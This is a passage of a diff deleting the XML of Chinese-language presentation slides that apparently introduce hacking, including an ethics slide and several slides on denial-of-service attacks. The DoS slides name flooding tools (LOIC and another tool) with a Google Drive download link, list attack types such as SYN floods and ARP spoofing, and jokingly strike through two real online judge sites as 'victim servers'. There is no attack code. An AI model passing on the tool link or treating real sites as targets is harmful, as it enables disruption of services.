-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>…</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="14" name="Content Placeholder 13"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>駭客的道德宣誓</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="0"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" strike="sngStrike" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>我要畢業了，我可以肆無忌憚的亂教黑魔法了</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" strike="sngStrike" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3432416375"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8140275C-B7AE-4E32-9365-0DF744C91CF1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>阻斷服務式攻擊 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(DoS)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496D8973-1F3A-4DA5-A4DD-B4765D549E7D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>概念</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>讓伺服器無法運作</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>舉例</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>一千個人同時打電話給你 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(Flooding)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>在你的飯裡面下藥 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(Malicious packet/request)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49968477"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD9AA0C-309C-4655-8F06-A4314FDBC837}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>阻斷服務式攻擊 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(DoS)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A87BBB-C870-444F-BA27-9088F5B00F37}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>受害者伺服器</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(Victim server</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0" smtClean="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" strike="sngStrike" dirty="0" err="1" smtClean="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>GreenJudge</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" strike="sngStrike" dirty="0" smtClean="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" strike="sngStrike" dirty="0" err="1" smtClean="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>ZeroJudge</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" strike="sngStrike" dirty="0" smtClean="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="1" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>實作</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>LOIC</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>邦寧小工具</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>https://drive.google.com/file/d/1k6KkImZjs295YsXg-hmwNzpHdKJZch6s/view?usp=sharing</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1421876659"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CADBB87-38A6-4F26-A517-44B988E12A42}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>阻斷服務式攻擊 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>(DoS)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE57F27-54CF-4D05-91C0-48C2B20C968B}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>更進一步</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>TCP Synchronize Flood</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>ICMP amplification flood</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>ARP Spoof</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
-                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
-              </a:rPr>
-              <a:t>惡意封包</a:t>
-            </a:r>
-            <a:r>
